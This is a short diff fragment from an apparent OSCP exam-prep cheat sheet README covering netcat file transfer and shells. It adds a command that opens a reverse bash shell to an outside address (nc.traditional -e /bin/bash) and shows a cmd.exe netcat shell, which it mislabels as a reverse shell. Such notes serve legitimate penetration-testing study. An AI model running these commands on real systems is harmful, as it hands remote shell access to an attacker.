monkeysm8/OSCP_HELP/README.md

     -   Receive a file using netcat
         `nc -nlvp 4444 > incoming.exe`

+    -   Some OSs (OpenBSD) will use nc.traditional rather than nc so watch out for that...

+            whereis nc
+            nc: /bin/nc.traditional /usr/share/man/man1/nc.1.gz

+            /bin/nc.traditional -e /bin/bash 1.2.3.4 4444

     -   Create a reverse shell with Ncat using cmd.exe on Windows
         `nc.exe -nlvp 4444 -e cmd.exe`